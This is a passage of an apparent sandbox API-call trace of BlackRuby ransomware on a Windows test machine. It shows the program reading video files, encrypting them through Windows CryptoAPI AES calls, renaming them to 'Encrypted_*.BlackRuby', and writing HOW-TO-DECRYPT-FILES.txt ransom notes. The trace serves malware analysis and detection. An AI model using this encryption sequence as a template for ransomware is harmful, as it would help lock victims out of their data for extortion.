lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6239670, ftCreationTime.dwHighDateTime=0x1d358a2, ftLastAccessTime.dwLowDateTime=0x90fde310, ftLastAccessTime.dwHighDateTime=0x1d359ef, ftLastWriteTime.dwLowDateTime=0x2d5403c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x148c0)) returned 1 [0062.299] GetLastError () returned 0xb7 [0062.299] SetErrorMode (uMode=0x0) returned 0x1 [0062.299] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ASlHJP92O6kGBd067Xgs.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\aslhjp92o6kgbd067xgs.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_rOp9aorCqBtVc9tRl4311By1TvjthtyxJl2fzMTgfZJORxZ.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_rop9aorcqbtvc9trl4311by1tvjthtyxjl2fzmtgfzjorxz.blackruby")) returned 1 [0062.300] GetLastError () returned 0xb7 [0062.300] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.300] GetLastError () returned 0xb7 [0062.300] SetErrorMode (uMode=0x1) returned 0x0 [0062.300] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.300] GetLastError () returned 0x0 [0062.300] GetFileType (hFile=0x258) returned 0x1 [0062.300] SetErrorMode (uMode=0x0) returned 0x1 [0062.300] GetFileType (hFile=0x258) returned 0x1 [0062.301] CloseHandle (hObject=0x258) returned 1 [0062.302] GetLastError () returned 0x0 [0062.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e888, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.302] GetLastError () returned 0x0 [0062.302] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0062.302] GetLastError () returned 0x0 [0062.302] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", lpFilePart=0x0) returned 0x54 [0062.302] GetLastError () returned 0x0 [0062.302] SetErrorMode (uMode=0x1) returned 0x0 [0062.302] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\bgy9frg14qy8xqzg9p9.swf"), fInfoLevelId=0x0, lpFileInformation=0x1d00d34 | out: lpFileInformation=0x1d00d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed98e10, ftCreationTime.dwHighDateTime=0x1d35695, ftLastAccessTime.dwLowDateTime=0xdc449290, ftLastAccessTime.dwHighDateTime=0x1d35163, ftLastWriteTime.dwLowDateTime=0xdc449290, ftLastWriteTime.dwHighDateTime=0x1d35163, nFileSizeHigh=0x0, nFileSizeLow=0x137be)) returned 1 [0062.302] GetLastError () returned 0x0 [0062.303] SetErrorMode (uMode=0x0) returned 0x1 [0062.303] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", lpFilePart=0x0) returned 0x54 [0062.303] GetLastError () returned 0x0 [0062.303] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", lpFilePart=0x0) returned 0x54 [0062.303] GetLastError () returned 0x0 [0062.303] SetErrorMode (uMode=0x1) returned 0x0 [0062.303] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\bgy9frg14qy8xqzg9p9.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.303] GetLastError () returned 0x0 [0062.303] GetFileType (hFile=0x258) returned 0x1 [0062.303] SetErrorMode (uMode=0x0) returned 0x1 [0062.303] GetFileType (hFile=0x258) returned 0x1 [0062.303] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x137be [0062.303] GetLastError () returned 0x0 [0062.303] ReadFile (in: hFile=0x258, lpBuffer=0x1d02bc8, nNumberOfBytesToRead=0x137be, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1d02bc8*, lpNumberOfBytesRead=0x18ecac*=0x137be, lpOverlapped=0x0) returned 1 [0062.304] GetLastError () returned 0x0 [0062.304] CloseHandle (hObject=0x258) returned 1 [0062.304] GetLastError () returned 0x0 [0062.304] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", lpFilePart=0x0) returned 0x54 [0062.304] GetLastError () returned 0x0 [0062.304] SetErrorMode (uMode=0x1) returned 0x0 [0062.304] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\bgy9frg14qy8xqzg9p9.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ed98e10, ftCreationTime.dwHighDateTime=0x1d35695, ftLastAccessTime.dwLowDateTime=0xdc449290, ftLastAccessTime.dwHighDateTime=0x1d35163, ftLastWriteTime.dwLowDateTime=0xdc449290, ftLastWriteTime.dwHighDateTime=0x1d35163, nFileSizeHigh=0x0, nFileSizeLow=0x137be)) returned 1 [0062.304] GetLastError () returned 0x0 [0062.304] SetErrorMode (uMode=0x0) returned 0x1 [0062.332] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b61a48, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360f60) returned 1 [0062.332] GetLastError () returned 0x0 [0062.332] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.332] GetLastError () returned 0x0 [0062.337] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.337] GetLastError () returned 0x0 [0062.337] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ae0) returned 1 [0062.337] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.337] GetLastError () returned 0x0 [0062.337] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1b8ea94*=0x1, dwFlags=0x0) returned 1 [0062.337] GetLastError () returned 0x0 [0062.337] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1b8ea60, dwFlags=0x0) returned 1 [0062.337] GetLastError () returned 0x0 [0062.337] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b8eadc*, pdwDataLen=0x18ec9c*=0x138b0, dwBufLen=0x138b0 | out: pbData=0x1b8eadc*, pdwDataLen=0x18ec9c*=0x138b0) returned 1 [0062.338] GetLastError () returned 0x0 [0062.338] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb5c68*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bb5c68*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.338] GetLastError () returned 0x0 [0062.338] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb5c98*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bb5c98*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.338] GetLastError () returned 0x0 [0062.338] CryptDestroyKey (hKey=0x360f60) returned 1 [0062.338] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.338] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.338] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf", lpFilePart=0x0) returned 0x54 [0062.338] GetLastError () returned 0x0 [0062.338] SetErrorMode (uMode=0x1) returned 0x0 [0062.340] GetFileType (hFile=0x258) returned 0x1 [0062.340] GetFileType (hFile=0x258) returned 0x1 [0062.342] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\bgY9FrG14QY8XqZG9p9.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\bgy9frg14qy8xqzg9p9.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_eFrMerR1Boao53FCuJEFX9ObiKqsYFMrUA4b2PAljS.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_efrmerr1boao53fcujefx9obikqsyfmrua4b2paljs.blackruby")) returned 1 [0062.342] GetLastError () returned 0xb7 [0062.344] SetErrorMode (uMode=0x0) returned 0x1 [0062.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.344] GetLastError () returned 0x5 [0062.344] SetErrorMode (uMode=0x1) returned 0x0 [0062.344] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), fInfoLevelId=0x0, lpFileInformation=0x1be6aa8 | out: lpFileInformation=0x1be6aa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9aa5410, ftCreationTime.dwHighDateTime=0x1d34f99, ftLastAccessTime.dwLowDateTime=0xb7ebcf20, ftLastAccessTime.dwHighDateTime=0x1d350ba, ftLastWriteTime.dwLowDateTime=0xb7ebcf20, ftLastWriteTime.dwHighDateTime=0x1d350ba, nFileSizeHigh=0x0, nFileSizeLow=0x154ca)) returned 1 [0062.344] GetLastError () returned 0x5 [0062.344] SetErrorMode (uMode=0x0) returned 0x1 [0062.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.344] GetLastError () returned 0x5 [0062.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.344] GetLastError () returned 0x5 [0062.344] SetErrorMode (uMode=0x1) returned 0x0 [0062.345] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.345] GetLastError () returned 0x0 [0062.345] GetFileType (hFile=0x258) returned 0x1 [0062.345] SetErrorMode (uMode=0x0) returned 0x1 [0062.345] GetFileType (hFile=0x258) returned 0x1 [0062.345] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x154ca [0062.345] GetLastError () returned 0x0 [0062.345] ReadFile (in: hFile=0x258, lpBuffer=0x2b0f5d0, nNumberOfBytesToRead=0x154ca, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2b0f5d0*, lpNumberOfBytesRead=0x18ecac*=0x154ca, lpOverlapped=0x0) returned 1 [0062.346] GetLastError () returned 0x0 [0062.346] CloseHandle (hObject=0x258) returned 1 [0062.346] GetLastError () returned 0x0 [0062.347] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.347] GetLastError () returned 0x0 [0062.347] SetErrorMode (uMode=0x1) returned 0x0 [0062.347] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9aa5410, ftCreationTime.dwHighDateTime=0x1d34f99, ftLastAccessTime.dwLowDateTime=0xb7ebcf20, ftLastAccessTime.dwHighDateTime=0x1d350ba, ftLastWriteTime.dwLowDateTime=0xb7ebcf20, ftLastWriteTime.dwHighDateTime=0x1d350ba, nFileSizeHigh=0x0, nFileSizeLow=0x154ca)) returned 1 [0062.347] GetLastError () returned 0x0 [0062.347] SetErrorMode (uMode=0x0) returned 0x1 [0062.347] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c708) returned 1 [0062.348] GetLastError () returned 0x0 [0062.387] CryptImportKey (in: hProv=0x37c708, pbData=0x1c429f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360de0) returned 1 [0062.387] GetLastError () returned 0x0 [0062.387] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.387] GetLastError () returned 0x0 [0062.392] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.392] GetLastError () returned 0x0 [0062.392] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360a20) returned 1 [0062.392] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.392] GetLastError () returned 0x0 [0062.392] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1c6fa3c*=0x1, dwFlags=0x0) returned 1 [0062.392] GetLastError () returned 0x0 [0062.392] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1c6fa08, dwFlags=0x0) returned 1 [0062.392] GetLastError () returned 0x0 [0062.393] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b3a0a0*, pdwDataLen=0x18ec9c*=0x155c0, dwBufLen=0x155c0 | out: pbData=0x2b3a0a0*, pdwDataLen=0x18ec9c*=0x155c0) returned 1 [0062.393] GetLastError () returned 0x0 [0062.394] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6fa98*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c6fa98*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.394] GetLastError () returned 0x0 [0062.394] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c6fac8*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c6fac8*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.394] GetLastError () returned 0x0 [0062.395] CryptDestroyKey (hKey=0x360de0) returned 1 [0062.395] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.395] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.395] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.395] GetLastError () returned 0x0 [0062.395] SetErrorMode (uMode=0x1) returned 0x0 [0062.395] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.396] GetLastError () returned 0xb7 [0062.396] GetFileType (hFile=0x258) returned 0x1 [0062.396] SetErrorMode (uMode=0x0) returned 0x1 [0062.397] GetFileType (hFile=0x258) returned 0x1 [0062.406] CloseHandle (hObject=0x258) returned 1 [0062.406] GetLastError () returned 0xb7 [0062.406] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf", lpFilePart=0x0) returned 0x45 [0062.406] GetLastError () returned 0xb7 [0062.406] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_R7tajv2pVRH9Wwbx4aQV55oDwkyrObklfa7X.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_R7tajv2pVRH9Wwbx4aQV55oDwkyrObklfa7X.BlackRuby", lpFilePart=0x0) returned 0x75 [0062.406] GetLastError () returned 0xb7 [0062.406] SetErrorMode (uMode=0x1) returned 0x0 [0062.406] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9aa5410, ftCreationTime.dwHighDateTime=0x1d34f99, ftLastAccessTime.dwLowDateTime=0xb7ebcf20, ftLastAccessTime.dwHighDateTime=0x1d350ba, ftLastWriteTime.dwLowDateTime=0x2d64ad60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x155d0)) returned 1 [0062.407] GetLastError () returned 0xb7 [0062.407] SetErrorMode (uMode=0x0) returned 0x1 [0062.407] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\epI1.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\epi1.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_R7tajv2pVRH9Wwbx4aQV55oDwkyrObklfa7X.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_r7tajv2pvrh9wwbx4aqv55odwkyrobklfa7x.blackruby")) returned 1 [0062.407] GetLastError () returned 0xb7 [0062.408] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.408] GetLastError () returned 0xb7 [0062.408] SetErrorMode (uMode=0x1) returned 0x0 [0062.408] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.408] GetLastError () returned 0x5 [0062.409] SetErrorMode (uMode=0x0) returned 0x1 [0062.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.409] GetLastError () returned 0x5 [0062.409] SetErrorMode (uMode=0x1) returned 0x0 [0062.409] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c8cf78 | out: lpFileInformation=0x1c8cf78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511a6880, ftCreationTime.dwHighDateTime=0x1d35a13, ftLastAccessTime.dwLowDateTime=0xd5108af0, ftLastAccessTime.dwHighDateTime=0x1d35060, ftLastWriteTime.dwLowDateTime=0xd5108af0, ftLastWriteTime.dwHighDateTime=0x1d35060, nFileSizeHigh=0x0, nFileSizeLow=0xd068)) returned 1 [0062.409] GetLastError () returned 0x5 [0062.409] SetErrorMode (uMode=0x0) returned 0x1 [0062.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.409] GetLastError () returned 0x5 [0062.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.409] GetLastError () returned 0x5 [0062.409] SetErrorMode (uMode=0x1) returned 0x0 [0062.409] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: 